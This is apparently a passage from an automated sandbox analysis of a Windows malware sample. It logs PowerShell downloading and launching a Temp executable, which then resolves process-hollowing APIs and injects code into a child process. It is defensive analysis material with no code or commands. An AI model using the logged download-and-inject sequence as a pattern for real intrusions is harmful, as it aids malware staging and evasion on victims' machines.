File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4356	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 18876	1	Fn Data
Inet	Read Response	size = 65536, size_out = 18876	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 18876	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 2904	1	Fn Data
Inet	Read Response	size = 65536, size_out = 2904	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 26136	1	Fn Data
Inet	Read Response	size = 65536, size_out = 26136	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4096	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 24944	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 8712	1	Fn Data
Inet	Read Response	size = 65536, size_out = 8712	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 8712	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 3472	1	Fn Data
Inet	Read Response	size = 65536, size_out = 3472	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 6692	1	Fn Data
Inet	Read Response	size = 65536, size_out = 6692	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4096	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 6068	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 40656	1	Fn Data
Inet	Read Response	size = 65536, size_out = 40656	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 40656	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 1452	1	Fn Data
Inet	Read Response	size = 65536, size_out = 1452	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 30492	1	Fn Data
Inet	Read Response	size = 65536, size_out = 30492	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4096	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 27848	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 60616, size_out = 24684	1	Fn Data
Inet	Read Response	size = 60616, size_out = 24684	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 24684	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 35932, size_out = 4356	1	Fn Data
Inet	Read Response	size = 35932, size_out = 4356	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4356	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 31576, size_out = 27588	1	Fn Data
Inet	Read Response	size = 31576, size_out = 27588	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 27588	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 3988, size_out = 3988	1	Fn Data
Inet	Read Response	size = 3988, size_out = 3988	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 2, size_out = 2	1	Fn Data
Inet	Read Response	size = 2, size_out = 2	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Inet	Read Response	size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Inet	Read Response	size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Inet	Read Response	size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 2, size_out = 2	1	Fn Data
Inet	Read Response	size = 2, size_out = 2	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 3988	1	Fn Data
File	Get Info		3	Fn
File	Get Info		2	Fn
Process	Get Info		1	Fn

Thread 0xb94

(Host: 0, Network: 0)

Category	Operation	Information	Success	Count	Logfile
Process	Create	C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe		1	Fn

Thread 0xb9c

(Host: 0, Network: 0)

Category	Operation	Information	Success	Count	Logfile
Process	Create	C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe		1	Fn

Thread 0xba8

(Host: 0, Network: 0)

Category	Operation	Information	Success	Count	Logfile
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe		1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe		1	Fn

Process #3: 8162.exe

(Host: 0, Network: 0)

Information	Value
ID	#3
File Name	c:\users\hjrd1k~1\appdata\local\temp\8162.exe
Command Line	"C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
Initial Working Directory	C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor	Start Time: 00:01:41, Reason: Child Process
Unmonitor	End Time: 00:02:59, Reason: Terminated by Timeout
Monitor Duration	00:01:18

OS Process Information

Information	Value
PID	0xba0
Parent PID	0xa94 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe)
File Name	c:\users\hjrd1k~1\appdata\local\temp\8162.exe
Command Line	"C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
Is Created or Modified Executable
Integrity Level	Medium
Username	1R6PFH\hJrD1KOKY DS8lUjv
Groups	1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000e539 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001a0000	0x001a0000	0x001a2fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001a0000	0x001a0000	0x001a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001e0000	0x001e0000	0x0025ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002a0000	0x002a0000	0x0039ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x003a0000	0x00406fff	Memory Mapped File	Readable	Region Actions
private_0x00000000004d0000	0x004d0000	0x004dffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000530000	0x00530000	0x0053ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000540000	0x00540000	0x006c7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006d0000	0x006d0000	0x00850fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000860000	0x00860000	0x009effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000860000	0x00860000	0x0093efff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000009b0000	0x009b0000	0x009effff	Private Memory	Readable, Writable	Region Actions
8162.exe	0x01100000	0x01147fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000001150000	0x01150000	0x0254ffff	Pagefile Backed Memory	Readable	Region Actions
wow64cpu.dll	0x73f80000	0x73f87fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x73f90000	0x73febfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73ff0000	0x7402efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x74c60000	0x74c72fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x75310000	0x7538ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x75630000	0x7568ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x756c0000	0x757cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x757d0000	0x757e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75800000	0x75845fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75a50000	0x75adffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75c60000	0x75d5ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75e80000	0x75f6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76fb0000	0x7707bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x77140000	0x771ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x77310000	0x773acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x773b0000	0x7744ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000077450000	0x77450000	0x7756efff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000077570000	0x77570000	0x77669fff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x77820000	0x77829fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Threads

Thread 0xba4

(Host: 0, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 1970097963	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 1970082386	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 1970094600	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 1970091423	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Module	Get Filename		1	Fn
File	Get Info	filename = STD_ERROR_HANDLE	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE	248	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 1976368414	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetMessageExtraInfo, address_out = 1976167798	1	Fn
Module	Load	module_name = kernel32, base_address = 1970012160	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = WinExec, address_out = 1970613281	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 1970099142	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 1970082434	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 1970082832	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 1970081906	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetThreadContext, address_out = 1970239956	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 1970083926	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 1970198960	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 1970083950	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 1970196428	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 1970199008	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadContext, address_out = 1970623379	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = ResumeThread, address_out = 1970095087	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 1970082102	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 1970082993	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 1970098593	1	Fn
Module	Load	module_name = ntdll.dll, base_address = 2005204992	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ntdll.dll, function = NtUnmapViewOfSection, address_out = 2005335152	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ntdll.dll, function = NtWriteVirtualMemory, address_out = 2005335556	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExA, address_out = 1976032152	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExA, address_out = 1976029742	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = PostMessageA, address_out = 1976056746	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetMessageA, address_out = 1976007635	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcA, address_out = 2005476576	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesA, address_out = 1970099220	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoA, address_out = 1970081280	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 1970619839	1	Fn
File	Get Info		3	Fn
Memory	Alloc	c:\users\hjrd1k~1\appdata\local\temp\8162.exe	1	Fn
Module	Get Filename		1	Fn
Process	Create	C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe	1	Fn
Memory	Free	c:\users\hjrd1k~1\appdata\local\temp\8162.exe	1	Fn
Memory	Alloc	c:\users\hjrd1k~1\appdata\local\temp\8162.exe	1	Fn
Memory	Read	C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe	1	Fn Data
Memory	Alloc	C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe	1	Fn
Memory	Write	C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe	1	Fn Data
Memory	Write	C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe	1	Fn Data
Memory	Write	C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe	1	Fn Data
Memory	Write	C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe	1	Fn Data
Memory	Write	C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe	1	Fn Data
Thread	Set Context	c:\users\hjrd1k~1\appdata\local\temp\8162.exe	1	Fn
Module	Get Handle	module_name = mscoree.dll	1	Fn

Process #4: 8162.exe

(Host: 0, Network: 0)

Information	Value
ID	#4
File Name	c:\users\hjrd1k~1\appdata\local\temp\8162.exe
Command Line	"C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
Initial Working Directory	C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor	Start Time: 00:01:44, Reason: Child Process
Unmonitor	End Time: 00:02:59, Reason: Terminated by Timeout
Monitor Duration	00:01:15

OS Process Information

Information	Value
PID	0xbb4
Parent PID	0xba0 (c:\users\hjrd1k~1\appdata\local\temp\8162.exe)
File Name	c:\users\hjrd1k~1\appdata\local\temp\8162.exe
Command Line	"C:\Users\HJRD1K~1\AppData\Local\Temp\8162.exe"
Is Created or Modified Executable
Integrity Level	Medium
Username	1R6PFH\hJrD1KOKY DS8lUjv
Groups	1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000e539 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001a0000	0x001a0000	0x0021ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000220000	0x00220000	0x0031ffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x00320000	0x00386fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000400000	0x00400000	0x00419fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000420000	0x00420000	0x004cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000004e0000	0x004e0000	0x004effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000004f0000	0x004f0000	0x00677fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000680000	0x00680000	0x00800fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000810000	0x00810000	0x008eefff	Pagefile Backed Memory	Readable	Region Actions
8162.exe	0x01100000	0x01147fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000001150000	0x01150000	0x0254ffff	Pagefile Backed Memory	Readable	Region Actions
wow64cpu.dll	0x73f80000	0x73f87fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x73f90000	0x73febfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73ff0000	0x7402efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x74c60000	0x74c72fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x75310000	0x7538ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x75630000	0x7568ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x756c0000	0x757cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x757d0000	0x757e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75800000	0x75845fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75a50000	0x75adffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75c60000	0x75d5ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75e80000	0x75f6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x761a0000	0x761f6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x76200000	0x7635bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x76360000	0x76fa9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76fb0000	0x7707bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x77140000	0x771ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x77310000	0x773acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x773b0000	0x7744ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000077450000	0x77450000	0x7756efff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000077570000	0x77570000	0x77669fff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x77820000	0x77829fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe	0xba4	address = 0x400000, size = 1024	1	Fn Data
Modify Memory	#3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe	0xba4	address = 0x401000, size = 62976	1	Fn Data
Modify Memory	#3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe	0xba4	address = 0x411000, size = 18944	1	Fn Data
Modify Memory	#3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe	0xba4	address = 0x416000, size = 6144	1	Fn Data
Modify Memory	#3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe	0xba4	address = 0x7efde008, size = 4	1	Fn Data
Modify Control Flow	#3: c:\users\hjrd1k~1\appdata\local\temp\8162.exe	0xba4	os_tid = 0xbb8, address = 0x778601c4	1	Fn

Threads

Thread 0xbb8

(Host: 0, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 1970097963	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 1970091423	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 1970082386	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 1970094600	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 1970097448	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 1970618635	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 1970618773	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 1970131743	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 1970204286	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 2005484572	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 2005648654	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 2005648257	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 1970204808	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 2005534167	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 2005649956	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 2005339020	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 2006121960	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 2005671453	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 1970620257	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 1970588945	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 1970618959	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 1970620081	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 1970693750	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 1970620241	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 1970693617	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 1970620353	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 1970620385	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 1970620401	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 1970204384	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0	1	Fn
